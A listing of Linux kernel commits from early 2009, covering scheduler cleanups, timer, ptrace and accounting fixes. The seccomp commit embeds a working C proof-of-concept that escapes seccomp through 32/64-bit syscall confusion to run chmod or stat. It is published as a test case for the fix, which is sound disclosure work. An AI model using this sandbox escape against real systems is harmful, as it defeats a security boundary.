1. 25 Mar, 2009: 13 commits
    • sched: Add comments to find_busiest_group() function · b7bb4c9b
      Gautham R Shenoy committed
      Impact: cleanup
      
      Add /** style comments around find_busiest_group(). Also add a few
      explanatory comments.
      
      This concludes the find_busiest_group() cleanup. The function is
      now down to 72 lines from the original 313 lines.
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091427.13992.18933.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Refactor the power savings balance code · c071df18
      Gautham R Shenoy committed
      Impact: cleanup
      
      Create separate helper functions to initialize the
      power-savings-balance related variables, to update them, and
      to check whether there is scope for performing power-savings balance.
      
      Add no-op inline functions for the !(CONFIG_SCHED_MC || CONFIG_SCHED_SMT)
      case.
      
      This eliminates the #ifdef jungle in find_busiest_group() and the
      other helper functions.
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091422.13992.73616.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Optimize the !power_savings_balance during fbg() · a021dc03
      Gautham R Shenoy committed
      Impact: cleanup, micro-optimization
      
      We don't need to perform power_savings balance if either the
      cpu is NOT_IDLE or the sched_domain doesn't have the
      SD_POWERSAVINGS_BALANCE flag set.
      
      Currently, we check for these conditions multiple times,
      even though these variables don't change over the scope
      of find_busiest_group().
      
      Check once, and store the value in the already existing
      "power_savings_balance" variable.
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091417.13992.2657.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Create a helper function to calculate imbalance · dbc523a3
      Gautham R Shenoy committed
      Move all of the imbalance calculation out of find_busiest_group()
      into this helper function.
      
      With this change, the structure of find_busiest_group() will be
      as follows:
      
      - update_sched_domain_statistics.
      
      - check if an imbalance exists.
      
      - update imbalance and return busiest.
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091411.13992.43293.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Create helper to calculate small_imbalance in fbg() · 2e6f44ae
      Gautham R Shenoy committed
      Impact: cleanup
      
      We have two places in find_busiest_group() where we need to calculate
      the minor imbalance before returning the busiest group. Encapsulate
      this functionality into a separate helper function.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091406.13992.54316.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Create a helper function to calculate sched_domain stats for fbg() · 37abe198
      Gautham R Shenoy committed
      Impact: cleanup
      
      Create a helper function named update_sd_lb_stats() to update the
      various sched_domain related statistics in find_busiest_group().
      
      With this, all of the statistics computation has been moved out of
      find_busiest_group().
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091401.13992.88737.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Define structure to store the sched_domain statistics for fbg() · 222d656d
      Gautham R Shenoy committed
      Impact: cleanup
      
      Currently we use a lot of local variables in find_busiest_group()
      to capture the various statistics related to the sched_domain.
      Group them together into a single data structure.
      
      This will help us to offload the job of updating the sched_domain
      statistics to a helper function.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091356.13992.25970.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Create a helper function to calculate sched_group stats for fbg() · 1f8c553d
      Gautham R Shenoy committed
      Impact: cleanup
      
      Create a helper function named update_sg_lb_stats() which
      can be invoked to calculate the individual group's statistics
      in find_busiest_group().
      
      This reduces the length of find_busiest_group() considerably.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091351.13992.43461.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Define structure to store the sched_group statistics for fbg() · 381be78f
      Gautham R Shenoy committed
      Impact: cleanup
      
      Currently a whole bunch of variables are used to store the
      various statistics pertaining to the groups we iterate over
      in find_busiest_group().
      
      Group them together in a single data structure and add
      appropriate comments.
      
      This will be useful later on when we create helper functions
      to calculate the sched_group statistics.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091345.13992.20099.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Fix indentations in find_busiest_group() using gotos · 6dfdb062
      Gautham R Shenoy committed
      Impact: cleanup
      
      Some indentation levels in find_busiest_group() can be reduced by using
      early exits with the help of gotos. This improves readability in
      a couple of cases.
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091340.13992.45062.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • sched: Simple helper functions for find_busiest_group() · 67bb6c03
      Gautham R Shenoy committed
      Impact: cleanup
      
      Currently the load_idx calculation code is in find_busiest_group().
      Move that to a static inline helper function.
      
      Similarly, to find the first cpu of a sched_group we use
      cpumask_first(sched_group_cpus(group)).
      
      Use a helper for that. It improves readability in some cases.
      Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091335.13992.55424.stgit@sofia.in.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • dynamic debug: combine dprintk and dynamic printk · e9d376f0
      Jason Baron committed
      This patch combines Greg Banks's dprintk() work with the existing dynamic
      printk patchset; we are now calling it 'dynamic debug'.
      
      The new feature of this patchset is a richer /debugfs control file interface
      (an example output from my system is at the bottom), which allows fine-grained
      control over the debug output. The output can be controlled by function,
      file, module, format string, and line number.
      
      For example, to enable all debug messages in module 'nf_conntrack':
      
      echo -n 'module nf_conntrack +p' > /mnt/debugfs/dynamic_debug/control
      
      To disable them:
      
      echo -n 'module nf_conntrack -p' > /mnt/debugfs/dynamic_debug/control
      
      A further explanation can be found in the documentation patch.
      Signed-off-by: Greg Banks <gnb@sgi.com>
      Signed-off-by: Jason Baron <jbaron@redhat.com>
      Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
    • sched: remove unused fields from struct rq · 67aa0f76
      Luis Henriques committed
      Impact: cleanup, new schedstat ABI
      
      Since they are used only in statistics and are always set to zero, the
      following fields from struct rq have been removed: yld_exp_empty,
      yld_act_empty and yld_both_empty.
      
      Both the sched debug and SCHEDSTAT_VERSION versions have also been
      incremented, since the ABIs have changed.
      
      The schedtop tool has been updated to properly handle the new version of
      schedstat:
      
         http://rt.wiki.kernel.org/index.php/Schedtop_utility
      Signed-off-by: Luis Henriques <henrix@sapo.pt>
      Acked-by: Gregory Haskins <ghaskins@novell.com>
      Acked-by: Peter Zijlstra <peterz@infradead.org>
      LKML-Reference: <20090324221002.GA10061@hades.domain.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
  2. 24 Mar, 2009: 2 commits
    • posix timers: fix RLIMIT_CPU && fork() · 37bebc70
      Oleg Nesterov committed
      See http://bugzilla.kernel.org/show_bug.cgi?id=12911
      
      copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost", because
      posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0, and thus
      fastpath_timer_check() returns false unless we have other cpu timers.
      
      This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not
      optimal; we need further cleanups here. With this patch update_rlimit_cpu()
      is not really needed, but I don't think it should be removed.
      
      The proper fix (I think) is:
      
      	- set_process_cpu_timer() should just start the cputimer->running
      	  logic (it does), no need to change cputime_expires.xxx_exp
      
      	- posix_cpu_timers_init_group() should set ->running when needed
      
      	- fastpath_timer_check() can check ->running instead of
      	  task_cputime_zero(signal->cputime_expires)
      Reported-by: Peter Lojkin <ia6432@inbox.ru>
      Signed-off-by: Oleg Nesterov <oleg@redhat.com>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Roland McGrath <roland@redhat.com>
      Cc: <stable@kernel.org> [for 2.6.29.x]
      LKML-Reference: <20090323193411.GA17514@redhat.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • fix ptrace slowness · 53da1d94
      Miklos Szeredi committed
      This patch fixes bug #12208:
      
        Bug-Entry       : http://bugzilla.kernel.org/show_bug.cgi?id=12208
        Subject         : uml is very slow on 2.6.28 host
      
      This turned out not to be a scheduler regression, but an already
      existing problem in ptrace that was triggered by subtle scheduler
      changes.
      
      The problem is this:
      
       - task A is ptracing task B
       - task B stops on a trace event
       - task A is woken up and preempts task B
       - task A calls ptrace on task B, which does ptrace_check_attach()
       - this calls wait_task_inactive(), which sees that task B is still on the runq
       - task A goes to sleep for a jiffy
       - ...
      
      Since UML does lots of the above sequences, those jiffies quickly add
      up to make it slow as hell.
      
      This patch solves this by not rescheduling in read_unlock() after
      ptrace_stop() has woken up the tracer.
      
      Thanks to Oleg Nesterov and Ingo Molnar for the feedback.
      Signed-off-by: Miklos Szeredi <mszeredi@suse.cz>
      CC: stable@kernel.org
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
  3. 18 Mar, 2009: 2 commits
  4. 17 Mar, 2009: 2 commits
  5. 13 Mar, 2009: 3 commits
  6. 12 Mar, 2009: 3 commits
  7. 11 Mar, 2009: 2 commits
  8. 10 Mar, 2009: 2 commits
  9. 09 Mar, 2009: 1 commit
    • Fix fixpoint divide exception in acct_update_integrals · 6d5b5acc
      Heiko Carstens committed
      Frans Pop reported the crash below when running an s390 kernel under Hercules:
      
        Kernel BUG at 000738b4 [verbose debug info unavailable]
        fixpoint divide exception: 0009 [#1] SMP
        Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx
           cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot
           dm_mod dasd_eckd_mod dasd_mod
        CPU: 0 Not tainted 2.6.27.19 #13
        Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18)
        Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118)
                   R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0
        Krnl GPRS: 00000000 000007d0 7fffffff fffff830
                   00000000 ffffffff 00000002 0f9ed9b8
                   00000000 00008ca0 00000000 0f9ed9b8
                   0f9edda4 8007386e 0f4f7ec8 0f4f7e98
        Krnl Code: 800738aa: a71807d0         lhi     %r1,2000
                   800738ae: 8c200001         srdl    %r2,1
                   800738b2: 1d21             dr      %r2,%r1
                  >800738b4: 5810d10e         l       %r1,270(%r13)
                   800738b8: 1823             lr      %r2,%r3
                   800738ba: 4130f060         la      %r3,96(%r15)
                   800738be: 0de1             basr    %r14,%r1
                   800738c0: 5800f060         l       %r0,96(%r15)
        Call Trace:
        ([<000000000004fdea>] blocking_notifier_call_chain+0x1e/0x2c)
         [<0000000000038502>] do_exit+0x106/0x7c0
         [<0000000000038c36>] do_group_exit+0x7a/0xb4
         [<0000000000038c8e>] SyS_exit_group+0x1e/0x30
         [<0000000000021c28>] sysc_do_restart+0x12/0x16
         [<0000000077e7e924>] 0x77e7e924
      
      The reason for this is that cpu time accounting usually only happens from
      interrupt context, but acct_update_integrals() also gets called from
      process context with interrupts enabled.
      
      So in acct_update_integrals we may end up with the following scenario:
      
      Between reading tsk->stime/tsk->utime and tsk->acct_timexpd, an interrupt
      happens which updates the accounting values.  This causes acct_timexpd to be
      greater than the former stime + utime.  The subsequent calculation of
      
      	dtime = cputime_sub(time, tsk->acct_timexpd);
      
      will be negative and the division performed by
      
      	cputime_to_jiffies(dtime)
      
      will generate an exception since the result won't fit into a 32 bit
      register.
      
      To fix this, always disable interrupts while accessing any
      of the accounting values.
      
      Reported by: Frans Pop <elendil@planet.nl>
      Tested by: Frans Pop <elendil@planet.nl>
      Cc: stable@kernel.org
      Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
      Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
  10. 06 Mar, 2009: 2 commits
    • sched: TIF_NEED_RESCHED -> need_resched() cleanup · 5ed0cec0
      Lai Jiangshan committed
      Impact: cleanup
      
      Use test_tsk_need_resched(), set_tsk_need_resched(), need_resched()
      instead of using TIF_NEED_RESCHED.
      Signed-off-by: Lai Jiangshan <laijs@cn.fujitsu.com>
      Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
      LKML-Reference: <49B10BA4.9070209@cn.fujitsu.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • percpu, module: implement reserved allocation and use it for module percpu variables · edcb4639
      Tejun Heo committed
      Impact: add reserved allocation functionality and use it for module
      	percpu variables
      
      This patch implements reserved allocation from the first chunk.  When
      setting up the first chunk, the arch can ask to set aside a certain number
      of bytes right after the core static area, which are available only
      through a separate reserved allocator.  This will be used primarily
      for module static percpu variables on architectures with limited
      relocation range, to ensure that the module percpu symbols are inside
      the relocatable range.
      
      If a reserved area is requested, the first chunk becomes reserved and
      isn't available for regular allocation.  If the first chunk also
      includes a piggy-back dynamic allocation area, a separate chunk mapping
      the same region is created to serve dynamic allocation.  The first one
      is called the static first chunk and the second the dynamic first chunk.
      Although they share the page map, their different area map
      initializations guarantee that they serve disjoint areas according to
      their purposes.
      
      If the arch doesn't set up a reserved area, reserved allocation is handled
      like any other allocation.
      Signed-off-by: Tejun Heo <tj@kernel.org>
  11. 05 Mar, 2009: 2 commits
    • sched: don't rebalance if attached on NULL domain · 8a0be9ef
      Frederic Weisbecker committed
      Impact: fix function graph trace hang / drop pointless softirq on UP
      
      While debugging a function graph trace hang on an old PII, I saw
      that it spent most of its time in the timer interrupt, and that
      the domain rebalancing softirq was the main culprit.
      
      The timer interrupt calls trigger_load_balance(), which
      decides whether it is worth scheduling a rebalancing softirq.
      
      In the case of a kernel built for UP, no problem arises because there
      are no domains to consider.
      
      In the case of an SMP kernel running on an SMP box, there is still no
      problem: the softirq will be raised each time we reach the
      next_balance time.
      
      In the case of an SMP kernel running on a UP box (most distros
      provide default SMP kernels, whatever box you have),
      the CPU is attached to the NULL sched domain, which leads to
      unexpected behaviour:
      
      trigger_load_balance() raises the rebalancing softirq. Later,
      in the softirq, run_rebalance_domains() calls rebalance_domains(), where
      the for_each_domain(cpu, sd) loop body is never entered because of the
      NULL domain we are attached to. This means rq->next_balance is never
      updated. So on the next timer tick, we enter
      trigger_load_balance(), which always raises the
      rebalancing softirq again:
      
      if (time_after_eq(jiffies, rq->next_balance))
      	raise_softirq(SCHED_SOFTIRQ);
      
      So on every tick, we process this pointless softirq.
      
      This patch fixes it by checking whether we are attached to the NULL
      domain before raising the softirq. Another possible fix would be
      to set rq->next_balance to the maximum possible jiffies value if
      we are attached to the NULL domain.
      
      v2: build fix on UP
      Signed-off-by: Frederic Weisbecker <fweisbec@gmail.com>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Cc: Peter Zijlstra <peterz@infradead.org>
      LKML-Reference: <49af242d.1c07d00a.32d5.ffffc019@mx.google.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • rcu: increment quiescent state counter in ksoftirqd() · 64ca5ab9
      Eric Dumazet committed
      If a machine is flooded by network frames, a cpu can loop
      100% of its time inside ksoftirqd() without calling schedule().
      This can delay RCU grace periods for an insanely long time.
      
      Adding an rcu_qsctr_inc() call in ksoftirqd() solves this problem.
      
      Paul: "This regression was a result of the recent change from
      "schedule()" to "cond_resched()", which got rid of that quiescent
      state in the common case where a reschedule is not needed".
      Signed-off-by: Eric Dumazet <dada1@cosmosbay.com>
      Reviewed-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
      Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
  12. 03 Mar, 2009: 2 commits
    • x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath committed
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process can make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: Roland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
    • genirq: assert that irq handlers are indeed running in hardirq context · 044d4084
      Peter Zijlstra committed
      Make sure the genirq layer is indeed running handlers
      in hardirq context. That is the genirq expectation, and doing
      anything else is broken.
      Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Andrew Morton <akpm@linux-foundation.org>
      LKML-Reference: <1236006812.5330.632.camel@laptop>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
  13. 02 Mar, 2009: 1 commit
  14. 28 Feb, 2009: 1 commit
  15. 27 Feb, 2009: 2 commits